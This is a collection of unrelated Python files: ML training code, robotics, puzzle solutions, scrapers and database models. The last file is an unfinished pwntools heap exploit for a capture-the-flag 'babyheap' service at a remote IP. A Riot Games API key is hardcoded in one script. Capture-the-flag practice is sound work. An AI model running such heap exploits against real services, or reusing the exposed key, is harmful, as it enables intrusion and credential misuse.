logger.debug("Using early stopping with patience %s", early_stopping_patience)
else:
logger.debug("No early stopping")
n_losses = len(loss_functions)
loss_weights = [1.0] * n_losses if loss_weights is None else loss_weights
# Verbosity
if verbose == "all": # Print output after every epoch
n_epochs_verbose = 1
elif verbose == "many": # Print output after 2%, 4%, ..., 100% progress
n_epochs_verbose = max(int(round(epochs / 50, 0)), 1)
elif verbose == "some": # Print output after 10%, 20%, ..., 100% progress
n_epochs_verbose = max(int(round(epochs / 20, 0)), 1)
elif verbose == "few": # Print output after 20%, 40%, ..., 100% progress
n_epochs_verbose = max(int(round(epochs / 5, 0)), 1)
elif verbose == "none": # Never print output
n_epochs_verbose = epochs + 2
else:
raise ValueError("Unknown value %s for keyword verbose", verbose)
logger.debug("Will print training progress every %s epochs", n_epochs_verbose)
logger.debug("Beginning main training loop")
losses_train, losses_val = [], []
# Loop over epochs
for i_epoch in range(epochs):
logger.debug("Training epoch %s / %s", i_epoch + 1, epochs)
lr = self.calculate_lr(i_epoch, epochs, initial_lr, final_lr)
self.set_lr(opt, lr)
logger.debug("Learning rate: %s", lr)
try:
loss_train, loss_val, loss_contributions_train, loss_contributions_val = self.epoch(
i_epoch, data_labels, train_loader, val_loader, opt, loss_functions, loss_weights, clip_gradient
)
losses_train.append(loss_train)
losses_val.append(loss_val)
except NanException:
logger.info("Ending training during epoch %s because NaNs appeared", i_epoch + 1)
break
if early_stopping:
try:
best_loss, best_model, best_epoch = self.check_early_stopping(
best_loss, best_model, best_epoch, loss_val, i_epoch, early_stopping_patience
)
except EarlyStoppingException:
logger.info("Early stopping: ending training after %s epochs", i_epoch + 1)
break
verbose_epoch = (i_epoch + 1) % n_epochs_verbose == 0
self.report_epoch(
i_epoch,
loss_labels,
loss_train,
loss_val,
loss_contributions_train,
loss_contributions_val,
verbose=verbose_epoch,
)
if early_stopping and len(losses_val) > 0:
self.wrap_up_early_stopping(best_model, losses_val[-1], best_loss, best_epoch)
logger.debug("Training finished")
return np.array(losses_train), np.array(losses_val)
@staticmethod
def report_data(data):
logger.debug("Training data:")
for key, value in six.iteritems(data):
logger.debug(
" %s: shape %s, first %s, mean %s, min %s, max %s",
key,
value.shape,
value[0],
np.mean(value, axis=0),
np.min(value, axis=0),
np.max(value, axis=0),
)
@staticmethod
def check_data(data):
pass
@staticmethod
def make_dataset(data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def make_dataloaders(self, dataset, validation_split, batch_size):
if validation_split is None or validation_split <= 0.0:
train_loader = DataLoader(dataset, batch_size=batch_size, shuffle=True, pin_memory=self.run_on_gpu)
val_loader = None
else:
assert 0.0 < validation_split < 1.0, "Wrong validation split: {}".format(validation_split)
n_samples = len(dataset)
indices = list(range(n_samples))
split = int(np.floor(validation_split * n_samples))
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx)
val_sampler = SubsetRandomSampler(valid_idx)
train_loader = DataLoader(dataset, sampler=train_sampler, batch_size=batch_size, pin_memory=self.run_on_gpu)
val_loader = DataLoader(dataset, sampler=val_sampler, batch_size=batch_size, pin_memory=self.run_on_gpu)
return train_loader, val_loader
@staticmethod
def calculate_lr(i_epoch, n_epochs, initial_lr, final_lr):
if n_epochs == 1:
return initial_lr
return initial_lr * (final_lr / initial_lr) ** float(i_epoch / (n_epochs - 1.0))
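    # geometric interpolation between initial_lr and final_lr: e.g. with
    # initial_lr=1e-3, final_lr=1e-4 and n_epochs=11, this yields 1e-3 at
    # epoch 0, ~3.16e-4 at epoch 5, and 1e-4 at the final epoch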
@staticmethod
def set_lr(optimizer, lr):
for param_group in optimizer.param_groups:
param_group["lr"] = lr
def epoch(
self,
i_epoch,
data_labels,
train_loader,
val_loader,
optimizer,
loss_functions,
loss_weights,
clip_gradient=None,
):
n_losses = len(loss_functions)
self.model.train()
loss_contributions_train = np.zeros(n_losses)
loss_train = 0.0
for i_batch, batch_data in enumerate(train_loader):
batch_data = OrderedDict(list(zip(data_labels, batch_data)))
batch_loss, batch_loss_contributions = self.batch_train(
batch_data, loss_functions, loss_weights, optimizer, clip_gradient
)
loss_train += batch_loss
for i, batch_loss_contribution in enumerate(batch_loss_contributions):
loss_contributions_train[i] += batch_loss_contribution
loss_contributions_train /= len(train_loader)
loss_train /= len(train_loader)
if val_loader is not None:
self.model.eval()
loss_contributions_val = np.zeros(n_losses)
loss_val = 0.0
for i_batch, batch_data in enumerate(val_loader):
batch_data = OrderedDict(list(zip(data_labels, batch_data)))
batch_loss, batch_loss_contributions = self.batch_val(batch_data, loss_functions, loss_weights)
loss_val += batch_loss
for i, batch_loss_contribution in enumerate(batch_loss_contributions):
loss_contributions_val[i] += batch_loss_contribution
loss_contributions_val /= len(val_loader)
loss_val /= len(val_loader)
else:
loss_contributions_val = None
loss_val = None
return loss_train, loss_val, loss_contributions_train, loss_contributions_val
def batch_train(self, batch_data, loss_functions, loss_weights, optimizer, clip_gradient=None):
loss_contributions = self.forward_pass(batch_data, loss_functions)
loss = self.sum_losses(loss_contributions, loss_weights)
self.optimizer_step(optimizer, loss, clip_gradient)
loss = loss.item()
loss_contributions = [contrib.item() for contrib in loss_contributions]
return loss, loss_contributions
def batch_val(self, batch_data, loss_functions, loss_weights):
loss_contributions = self.forward_pass(batch_data, loss_functions)
loss = self.sum_losses(loss_contributions, loss_weights)
loss = loss.item()
loss_contributions = [contrib.item() for contrib in loss_contributions]
return loss, loss_contributions
def forward_pass(self, batch_data, loss_functions):
"""
Forward pass of the model. Needs to be implemented by any subclass.
Parameters
----------
batch_data : OrderedDict with str keys and Tensor values
The data of the minibatch.
loss_functions : list of function
Loss functions.
Returns
-------
losses : list of Tensor
Losses as scalar pyTorch tensors.
"""
raise NotImplementedError
@staticmethod
def sum_losses(contributions, weights):
loss = weights[0] * contributions[0]
for _w, _l in zip(weights[1:], contributions[1:]):
loss = loss + _w * _l
return loss
def optimizer_step(self, optimizer, loss, clip_gradient):
optimizer.zero_grad()
loss.backward()
if clip_gradient is not None:
clip_grad_norm_(self.model.parameters(), clip_gradient)
optimizer.step()
def check_early_stopping(self, best_loss, best_model, best_epoch, loss, i_epoch, early_stopping_patience=None):
if best_loss is None or loss < best_loss:
best_loss = loss
best_model = self.model.state_dict()
best_epoch = i_epoch
if early_stopping_patience is not None and i_epoch - best_epoch > early_stopping_patience >= 0:
raise EarlyStoppingException
if loss is None or not np.isfinite(loss):
raise EarlyStoppingException
return best_loss, best_model, best_epoch
@staticmethod
def report_epoch(
i_epoch, loss_labels, loss_train, loss_val, loss_contributions_train, loss_contributions_val, verbose=False
):
logging_fn = logger.info if verbose else logger.debug
def contribution_summary(labels, contributions):
summary = ""
for i, (label, value) in enumerate(zip(labels, contributions)):
if i > 0:
summary += ", "
summary += "{}: {:>6.3f}".format(label, value)
return summary
train_report = "Epoch {:>3d}: train loss {:>8.5f} ({})".format(
i_epoch + 1, loss_train, contribution_summary(loss_labels, loss_contributions_train)
)
logging_fn(train_report)
if loss_val is not None:
val_report = " val. loss {:>8.5f} ({})".format(
loss_val, contribution_summary(loss_labels, loss_contributions_val)
)
logging_fn(val_report)
    def wrap_up_early_stopping(self, best_model, current_loss, best_loss, best_epoch):
        if best_loss is None or not np.isfinite(best_loss):
            logger.warning("Best loss is None or not finite, cannot wrap up early stopping")
        elif current_loss is None or not np.isfinite(current_loss) or best_loss < current_loss:
            logger.info(
                "Early stopping after epoch %s, with loss %8.5f compared to final loss %8.5f",
                best_epoch + 1,
                best_loss,
                current_loss,
            )
self.model.load_state_dict(best_model)
else:
logger.info("Early stopping did not improve performance")
@staticmethod
def _check_for_nans(label, *tensors):
for tensor in tensors:
if tensor is None:
continue
if torch.isnan(tensor).any():
logger.warning("%s contains NaNs, aborting training! Data:\n%s", label, tensor)
raise NanException
class SingleParameterizedRatioTrainer(Trainer):
def __init__(self, model, run_on_gpu=True, double_precision=False):
super(SingleParameterizedRatioTrainer, self).__init__(model, run_on_gpu, double_precision)
self.calculate_model_score = True
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "theta" not in data_keys or "y" not in data_keys:
raise ValueError("Missing required information 'x', 'theta', or 'y' in training data!")
for key in data_keys:
if key not in ["x", "theta", "y", "r_xz", "t_xz"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
self.calculate_model_score = "t_xz" in data_keys
if self.calculate_model_score:
logger.debug("Model score will be calculated")
else:
logger.debug("Model score will not be calculated")
def make_dataset(self, data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
if key == "theta":
tensor_data.append(torch.tensor(value, requires_grad=True))
else:
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def forward_pass(self, batch_data, loss_functions):
theta = batch_data["theta"].to(self.device, self.dtype)
x = batch_data["x"].to(self.device, self.dtype)
y = batch_data["y"].to(self.device, self.dtype)
try:
r_xz = batch_data["r_xz"].to(self.device, self.dtype)
except KeyError:
r_xz = None
try:
t_xz = batch_data["t_xz"].to(self.device, self.dtype)
except KeyError:
t_xz = None
self._check_for_nans("Training data", theta, x, y)
self._check_for_nans("Augmented training data", r_xz, t_xz)
s_hat, log_r_hat, t_hat = self.model(theta, x, track_score=self.calculate_model_score, return_grad_x=False)
self._check_for_nans("Model output", s_hat, log_r_hat, t_hat)
losses = [loss_function(s_hat, log_r_hat, t_hat, None, y, r_xz, t_xz, None) for loss_function in loss_functions]
self._check_for_nans("Loss", *losses)
return losses
class DoubleParameterizedRatioTrainer(Trainer):
def __init__(self, model, run_on_gpu=True, double_precision=False):
super(DoubleParameterizedRatioTrainer, self).__init__(model, run_on_gpu, double_precision)
self.calculate_model_score = True
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "theta0" not in data_keys or "theta1" not in data_keys or "y" not in data_keys:
raise ValueError("Missing required information 'x', 'theta0', 'theta1', or 'y' in training data!")
for key in data_keys:
if key not in ["x", "theta0", "theta1" "y", "r_xz", "t_xz0", "t_xz1"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
self.calculate_model_score = "t_xz0" in data_keys or "t_xz1" in data_keys
if self.calculate_model_score:
logger.debug("Model score will be calculated")
else:
logger.debug("Model score will not be calculated")
def make_dataset(self, data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
if key in ["theta0", "theta1"]:
tensor_data.append(torch.tensor(value, requires_grad=True))
else:
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def forward_pass(self, batch_data, loss_functions):
theta0 = batch_data["theta0"].to(self.device, self.dtype)
theta1 = batch_data["theta1"].to(self.device, self.dtype)
x = batch_data["x"].to(self.device, self.dtype)
y = batch_data["y"].to(self.device, self.dtype)
try:
r_xz = batch_data["r_xz"].to(self.device, self.dtype)
except KeyError:
r_xz = None
try:
t_xz0 = batch_data["t_xz0"].to(self.device, self.dtype)
except KeyError:
t_xz0 = None
try:
t_xz1 = batch_data["t_xz1"].to(self.device, self.dtype)
except KeyError:
t_xz1 = None
self._check_for_nans("Training data", theta0, theta1, x, y)
self._check_for_nans("Augmented training data", r_xz, t_xz0, t_xz1)
s_hat, log_r_hat, t_hat0, t_hat1 = self.model(
theta0, theta1, x, track_score=self.calculate_model_score, return_grad_x=False
)
self._check_for_nans("Model output", s_hat, log_r_hat, t_hat0, t_hat1)
losses = [
loss_function(s_hat, log_r_hat, t_hat0, t_hat1, y, r_xz, t_xz0, t_xz1) for loss_function in loss_functions
]
self._check_for_nans("Loss", *losses)
return losses
class LocalScoreTrainer(Trainer):
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "t_xz" not in data_keys:
raise ValueError("Missing required information 'x' or 't_xz' in training data!")
for key in data_keys:
if key not in ["x", "t_xz"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
def forward_pass(self, batch_data, loss_functions):
x = batch_data["x"].to(self.device, self.dtype)
t_xz = batch_data["t_xz"].to(self.device, self.dtype)
self._check_for_nans("Training data", x)
self._check_for_nans("Augmented training data", t_xz)
t_hat = self.model(x)
self._check_for_nans("Model output", t_hat)
losses = [loss_function(t_hat, t_xz) for loss_function in loss_functions]
self._check_for_nans("Loss", *losses)
return losses
class FlowTrainer(Trainer):
def __init__(self, model, run_on_gpu=True, double_precision=False):
super(FlowTrainer, self).__init__(model, run_on_gpu, double_precision)
self.calculate_model_score = True
def check_data(self, data):
data_keys = list(data.keys())
if "x" not in data_keys or "theta" not in data_keys:
raise ValueError("Missing required information 'x' or 'theta' in training data!")
for key in data_keys:
if key not in ["x", "theta", "t_xz"]:
logger.warning("Unknown key %s in training data! Ignoring it.", key)
self.calculate_model_score = "t_xz" in data_keys
if self.calculate_model_score:
logger.debug("Model score will be calculated")
else:
logger.debug("Model score will not be calculated")
def make_dataset(self, data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
if key == "theta":
tensor_data.append(torch.tensor(value, requires_grad=True))
else:
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def forward_pass(self, batch_data, loss_functions):
x = batch_data["x"].to(self.device, self.dtype)
theta = batch_data["theta"].to(self.device, self.dtype)
try:
t_xz = batch_data["t_xz"].to(self.device, self.dtype)
except KeyError:
t_xz = None
self._check_for_nans("Training data", theta, x)
self._check_for_nans("Augmented training data", t_xz)
if self.calculate_model_score:
_, log_likelihood, t_hat = self.model.log_likelihood_and_score(theta, x)
else:
_, log_likelihood = self.model.log_likelihood(theta, x)
t_hat = None
self._check_for_nans("Model output", log_likelihood, t_hat)
losses = [loss_function(log_likelihood, t_hat, t_xz) for loss_function in loss_functions]
self._check_for_nans("Loss", *losses)
return losses
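# Minimal usage sketch (hypothetical model, data, and loss; not part of the
# original module). LocalScoreTrainer.forward_pass calls each loss as
# loss_function(t_hat, t_xz):
#
#   import torch.nn as nn
#   model = nn.Sequential(nn.Linear(4, 16), nn.Tanh(), nn.Linear(16, 2))
#   trainer = LocalScoreTrainer(model, run_on_gpu=False)
#   losses_train, losses_val = trainer.train(
#       data={"x": x_array, "t_xz": t_array},  # numpy arrays, shapes (n, 4), (n, 2)
#       loss_functions=[lambda t_hat, t_xz: torch.mean((t_hat - t_xz) ** 2)],
#       loss_labels=["mse"],
#       epochs=10,
#       batch_size=64,
#   )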
|
#!/usr/bin/python
#\file kuka_joint_states.py
#\brief Convert /iiwa/state/JointPosition topic to /joint_states.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Jun.08, 2017
import roslib; roslib.load_manifest('iiwa_ros')
import rospy
import sensor_msgs.msg
import iiwa_msgs.msg
import copy
def Callback(pub_st, msg):
#remove_names= ('head_nod','torso_t0')
#if all(rmname not in msg.name for rmname in remove_names):
#pub_st.publish(msg)
#else:
#msg2= sensor_msgs.msg.JointState()
#msg2.header= msg.header
#idxs= [i for i,name in enumerate(msg.name) if name not in remove_names]
#msg2.name= [msg.name[i] for i in idxs]
#if len(msg.position)>0: msg2.position= [msg.position[i] for i in idxs]
#if len(msg.velocity)>0: msg2.velocity= [msg.velocity[i] for i in idxs]
#if len(msg.effort)>0: msg2.effort= [msg.effort[i] for i in idxs]
#pub_st.publish(msg2)
joint_names= ('a%d'%d for d in xrange(1,8))
msg2= sensor_msgs.msg.JointState()
msg2.header= msg.header
#idxs= [i for i,name in enumerate(msg.name) if name not in remove_names]
msg2.name= ['iiwa_joint_%d'%d for d in xrange(1,8)]
msg2.position= [getattr(msg.position,name) for name in joint_names]
#if len(msg.velocity)>0: msg2.velocity= [msg.velocity[i] for i in idxs]
#if len(msg.effort)>0: msg2.effort= [msg.effort[i] for i in idxs]
pub_st.publish(msg2)
if __name__=='__main__':
rospy.init_node('kuka_joint_states')
pub_st= rospy.Publisher('/joint_states', sensor_msgs.msg.JointState, queue_size=1)
sub_st= rospy.Subscriber('/iiwa/state/JointPosition', iiwa_msgs.msg.JointPosition, lambda msg: Callback(pub_st,msg))
rospy.spin()
|
import copy
class Solution(object):
def stoneGame(self, piles):
"""
:type piles: List[int]
:rtype: bool
"""
        # brute-force backtracking over pick orders; note that every pick is
        # credited to Alex (the opponent's turns are not simulated), so this
        # asks whether some pick order gives Alex more than half the stones
alex_sum = 0
total_sum = sum(piles)
return self._helper(piles, alex_sum, total_sum)
def _helper(self, remain_piles, alex_sum, total_sum):
if alex_sum > 0.5 * total_sum:
return True
if len(remain_piles) == 0:
return alex_sum > 0.5 * total_sum
for i in range(len(remain_piles)):
remain_piles_copy = copy.copy(remain_piles)
del remain_piles_copy[i]
if self._helper(remain_piles_copy, alex_sum + remain_piles[i], total_sum):
return True
return False
if __name__ == "__main__":
s = Solution()
piles = [5, 3, 4, 5]
    print(s.stoneGame(piles)) |
# -*- coding: utf-8 -*-
#############
#
# Copyright - Nirlendu Saha
#
# author - nirlendu@gmail.com
#
#############
from __future__ import unicode_literals
import uuid
from datetime import datetime
from cassandra.cqlengine import columns
from cassandra.cqlengine.models import Model as ModelCassandra
class ChannelSecondary(ModelCassandra):
    channel_secondary_id = columns.Text(primary_key=True, default=lambda: str(uuid.uuid4()).replace('-', '')[:8], required=True)
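    # note: the default is a callable so a fresh uuid is generated per row;
    # a plain str(uuid.uuid4()) would be evaluated once at class definition
    # and shared by every row (same applies to the id defaults below)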
channel_primary_id = columns.Text(index=True, required=True)
channel_name = columns.Text(required=True)
channel_unique_name = columns.Text(index=True, required=True)
channel_weight = columns.Decimal(default=0)
total_followers = columns.Integer(default=0)
channel_expression_list = columns.List(value_type=columns.Text(),default=[])
class PersonSecondary(ModelCassandra):
    person_secondary_id = columns.Text(primary_key=True, default=lambda: str(uuid.uuid4()).replace('-', '')[:12], required=True)
user_name = columns.Text(index=True, required=True)
person_primary_id = columns.Text(index=True, required=True)
person_name = columns.Text(required=True)
total_followers = columns.Integer(default=0)
person_weight = columns.Decimal(default=0)
person_channel_followee_list = columns.List(value_type=columns.Text(),default=[])
person_person_followee_list = columns.List(value_type=columns.Text(),default=[])
person_expression_list = columns.List(value_type=columns.Text(),default=[])
class ExpressionSecondary(ModelCassandra):
    expression_secondary_id = columns.Text(primary_key=True, default=lambda: str(uuid.uuid4()).replace('-', '')[:16], required=True)
expression_primary_id = columns.Text(index=True, required=True)
expression_owner_id = columns.Text(required=True)
expression_weight = columns.Decimal(default=0)
expression_content = columns.Text(required=True)
expression_content_url = columns.Text(default=None)
expression_imagefile = columns.Text(default=None)
broadcast_parent_id = columns.Text(default=None)
    expression_time = columns.DateTime(default=datetime.now)
expression_channel = columns.List(value_type=columns.Text(),default=[])
total_upvotes = columns.Integer(default=0)
total_broadcasts = columns.Integer(default=0)
total_discussions = columns.Integer(default=0)
total_collects = columns.Integer(default=0)
expression_upvote_list = columns.List(value_type=columns.Text(),default=[])
expression_broadcast_list = columns.List(value_type=columns.Text(),default=[])
expression_discussion_list = columns.List(value_type=columns.Text(),default=[])
expression_collection_list = columns.List(value_type=columns.Text(),default=[])
class UrlSecondary(ModelCassandra):
    url_secondary_id = columns.Text(primary_key=True, default=lambda: str(uuid.uuid4()).replace('-', '')[:16], required=True)
url_primary_id = columns.Text(index=True, required=True)
url = columns.Text(index=True, required=True)
url_title = columns.Text(required=True)
url_desc = columns.Text(default=None)
url_imagefile = columns.Text(default=None)
url_weight = columns.Decimal(default=0) |
# go to
# and reset API key
# then CTRL+C CTRL+V it below
import cassiopeia as cass
from os.path import dirname, abspath
riot_api_key = "RGAPI-77619554-7949-4393-be68-5e643092e8b4"
config = cass.get_default_config()
# stores data to disk
# doesn't work with match history :(
config["pipeline"]["SimpleKVDiskStore"] = {
"package": "cassiopeia_diskstore",
"path": "{}/data".format(dirname(abspath(__file__)))
}
# # SQLStore not yet working
# config["pipeline"]["SQLStore"] = {
# "package": "cassiopeia_sqlstore",
# "path": "sqlite:///{}/data/foo.db".format(dirname(abspath(__file__)))
# }
cass.apply_settings(config)
cass.set_riot_api_key(riot_api_key)
cass.set_default_region("NA")
# Faker is the top rated player in LOL
summoner = cass.get_summoner(name="Faker")
print("{accountId}: {name} is a level {level} summoner on the {region} server."\
.format(accountId=summoner.id,
name=summoner.name,
level=summoner.level,
region=summoner.region)
)
#
# get Faker's match history and his last match
# faker_match_history = summoner.match_history
# print("His match history is length: {}".format(len(faker_match_history)))
# faker_last_match_id = faker_match_history[0].id
faker_last_match_id = 2842707542
faker_last_match = cass.get_match(faker_last_match_id)
last_match_timeline = faker_last_match.timeline
print("last match frames: {}".format(len(last_match_timeline.frames)))
print("match length: {}".format(faker_last_match.duration))
last_match_frames = last_match_timeline.frames
# make a data folder
from os import path, getcwd, mkdir
data_folder_name = "data"
pwd = getcwd()
full_path = path.join(pwd, data_folder_name)
if not path.isdir(full_path):
mkdir(full_path)
# write data out to files
for frame in last_match_frames:
timestamp = frame.timestamp
print("Timestamp {}".format(timestamp))
file_name = "{}-{}".format(faker_last_match_id, timestamp)
# # write to json
# json_frame = frame.to_json()
# print(json_frame)
# with open(file_name, 'w') as fh:
# fh.write(json_frame)
# # write to CSV
import csv
with open(data_folder_name + "/" + file_name + ".csv", 'w+') as csvfile:
frame_writer = csv.writer(csvfile)
header = "matchId, timestamp, positionX, positionY, creepScore, currentGold, dominionScore, experience, goldEarned, level, neutralMinionsKilled, participantId, teamScore"
header = [word for word in header.replace(',', '').split(' ')]
frame_writer.writerow(header)
participantFrames = [value.to_dict() for key, value in frame.participant_frames.items()]
for pframe in participantFrames:
            try:
                pos_x = pframe['position']['x']
                pos_y = pframe['position']['y']
            except KeyError:
                # some participant frames carry no position data
                pos_x = 0
                pos_y = 0
row = [faker_last_match_id, timestamp, pos_x, pos_y]
columns = [
'creepScore',
'currentGold',
'dominionScore',
'experience',
'goldEarned',
'level',
'neutralMinionsKilled',
'participantId',
'teamScore'
]
for col in columns:
row.append(pframe[col])
print(row)
frame_writer.writerow(row)
|
import numpy as np
import math
# Once you think it through, this is the classic maximum-sum contiguous window problem
# The flood cannot erode walls that are already painted, so once the window is found it can always be fully painted
# Time complexity O(N)
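# e.g. wall '10111' with paint_num = 3: window sums are 2 ('101'), 2 ('011'), 3 ('111'),
# so the answer is 3 (illustrative example, not taken from the input files)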
output = open("./B-large-practice.out", 'w+')
with open('./B-large-practice.in') as fp:
T = int(fp.readline())
cur_rd = 1
while cur_rd <= T:
        key = 'Case #' + str(cur_rd) + ': '
cur_rd += 1
N = int(fp.readline().strip('\n'))
wall = fp.readline().strip('\n')
paint_num = int((len(wall)+1)/2)
cur = sum([int(n) for n in wall[0:paint_num]])
total = cur
for t in range(0, len(wall)-paint_num):
cur = cur - int(wall[t]) + int(wall[paint_num+t])
total = max(total, cur)
total_str = str(total)
print(key+total_str)
print('{0}'.format(key+total_str), file=output)
|
# Generated by Django 3.0.5 on 2020-04-21 06:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('learning_logs', '0006_auto_20200421_0643'),
]
operations = [
migrations.AlterField(
model_name='entry',
name='date_added',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='entry',
name='text',
field=models.TextField(),
),
migrations.AlterField(
model_name='entry',
name='topic',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='learning_logs.Topic'),
),
migrations.AlterField(
model_name='topic',
name='date_added',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='topic',
name='text',
field=models.CharField(max_length=200),
),
]
|
# ! /usr/bin/env python
import requests
from bs4 import BeautifulSoup as BS
import time
def download(url):
# url = 'https://xs.sogou.com/chapter/14734139_481036348916/'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'Host': 'xs.sogou.com',
'Upgrade-Insecure-Requests': '1',
'Connection': 'keep-alive',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
    response = requests.get(url, headers=headers)
data = response.text
# print(data)
soup = BS(data, 'lxml')
paperdiv = soup.select('div[class="paper-box paper-article"]')[0]
# print(paperdiv)
paperh1 = soup.select('div[class="paper-box paper-article"] h1')[0].string
paperinfo = soup.select('div[class="paper-box paper-article"] div[class="info"]')[0].string
papercontent = soup.select('div[class="paper-box paper-article"] div[id="contentWp"]')[0].get_text()
print(paperh1 + '\n' + paperinfo + '\n' + papercontent + '\n')
# https://xs.sogou.com/chapter/14734139_481036348916/
# the whole novel
url = 'https://xs.sogou.com/list/14734139/'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
}
response = requests.get(url, headers=headers)
data = response.text
soup = BS(data, 'lxml')
papera = soup.select('ul[class="chapter clear"] a')
# print(papera)
for a in papera:
    a = a.get('href')  # href="/chapter/14734139_481036348916/"
    pa = 'https://xs.sogou.com' + str(a)  # full url
# print(pa)
download(pa)
time.sleep(1)
|
import sys
from lxml import html
import requests
import urlparse
import os
import argparse
import re
def process_links(links, formats=["jpg", "png", "gif", "svg", "jpeg"]):
x = []
for l in links:
# TODO regular expressions
if os.path.splitext(l)[1][1:].strip().lower() in formats:
x.append(l)
return x
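# e.g. process_links(["http://a/x.jpg", "http://a/notes.txt"]) -> ["http://a/x.jpg"]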
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('url2scrape', nargs=1, help="URL to scrape")
parser.add_argument('-m', '--max-images', type=int, default=0,
help="Limit on number of images")
parser.add_argument('-s', '--save-dir', type=str, default="images",
help="Directory in which images should be saved")
parser.add_argument('-g', '--injected', help="scrape injected images",
action="store_true")
parser.add_argument('--max-filesize', type=int, default=100000000,
help="Limit on size of image in bytes")
parser.add_argument('--dump-urls', default=False,
help="Print the URLs of the images",
action="store_true")
args = parser.parse_args()
URL = args.url2scrape[0]
if not re.match(r'^[a-zA-Z]+://', URL):
URL = 'http://' + URL
no_to_download = args.max_images
save_dir = args.save_dir + '_{uri.netloc}'.format(uri=urlparse.urlparse(URL))
download_path = os.path.join(os.getcwd(), save_dir)
use_ghost = args.injected
format_list = ["jpg", "png", "gif", "svg", "jpeg"]
max_filesize = args.max_filesize
dump_urls = args.dump_urls
return (URL, no_to_download, format_list, download_path, max_filesize,
dump_urls, use_ghost)
def process_download_path(download_path):
if os.path.exists(download_path):
if not os.access(download_path, os.W_OK):
sys.exit("Sorry, the directory can't be accessed.")
elif os.access(os.path.dirname(download_path), os.W_OK):
os.makedirs(download_path)
else:
sys.exit("Sorry, the directory can't be created.")
def get_html(URL, use_ghost):
if use_ghost:
URL = urlparse.urljoin("http://", URL)
import selenium
import selenium.webdriver
driver = selenium.webdriver.PhantomJS(service_log_path=os.path.devnull)
driver.get(URL)
page_html = driver.page_source
page_url = driver.current_url
driver.quit()
else:
try:
page = requests.get(URL)
except requests.exceptions.MissingSchema:
URL = "http://" + URL
page = requests.get(URL)
finally:
page_html = page.text
page_url = page.url
return (page_html, page_url)
def get_img_list(page_html, page_url, format_list):
tree = html.fromstring(page_html)
img = tree.xpath('//img/@src')
links = tree.xpath('//a/@href')
img_list = process_links(img, format_list)
img_links = process_links(links, format_list)
img_list.extend(img_links)
images = [urlparse.urljoin(page_url, url) for url in img_list]
images = list(set(images))
return images
def download_image(img_url, download_path, max_filesize):
img_request = None
success_flag = True
size_success_flag = True
    try:
        img_request = requests.request('get', img_url, stream=True)
    except requests.exceptions.RequestException as e:
        # img_request may still be None here, so report the exception rather
        # than a status code
        success_flag = False
        print "download of %s failed: %s" % (img_url, e)
        return success_flag, size_success_flag
if int(img_request.headers['content-length']) < max_filesize:
img_content = img_request.content
        f = open(os.path.join(download_path, img_url.split('/')[-1]), 'wb')
f.write(img_content)
f.close()
else:
success_flag = False
size_success_flag = False
return success_flag, size_success_flag
|
# Level 13
# http://www.pythonchallenge.com/pc/return/disproportional.html
# C:\Users\pablo>curl -u huge:file http://www.pythonchallenge.com/pc/return/evil4.jpg
# Bert is evil! go back!
# Python Console
"""phonebook = xmlrpc.client.ServerProxy('http://www.pythonchallenge.com/pc/phonebook.php')
phonebook
phonebook.phone('Bert')
out '555-ITALY'"""
# Next level: http://www.pythonchallenge.com/pc/return/italy.html
|
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./babyheap"
#"""
HOST = "35.186.153.116"
PORT = 7001
"""
HOST = "localhost"
PORT = 7777
"""
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
#elf = ELF(FILE_NAME)
#addr_main = elf.symbols["main"]
#addr_bss = elf.bss()
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
#
#libc = ELF('./')
#libc_binsh = next(libc.search("/bin/sh"))
def create(size, data):
conn.sendlineafter("> ", "1")
conn.sendlineafter(": ", str(size))
conn.sendafter(": ", data)
def delete(index):
conn.sendlineafter("> ", "2")
conn.sendlineafter(": ", str(index))
def show(index):
conn.sendlineafter("> ", "3")
conn.sendlineafter(": ", str(index))
conn.recvuntil("data: ")
def exploit():
b_data = "B"*0xf8
b_data += p64(0xc1)
b_data += "B"*(0x1b7-len(b_data))
create(0xf7, "A"*0xf7) #A 0
create(0x1b7, b_data) #B 1
create(0xf7, "C"*0xf7) #C 2
create(0xf7, "D"*0xf7) #D 3
delete(0)
create(0xf8, "A"*0xf8) #A 0
delete(0)
conn.interactive()
if __name__ == "__main__":
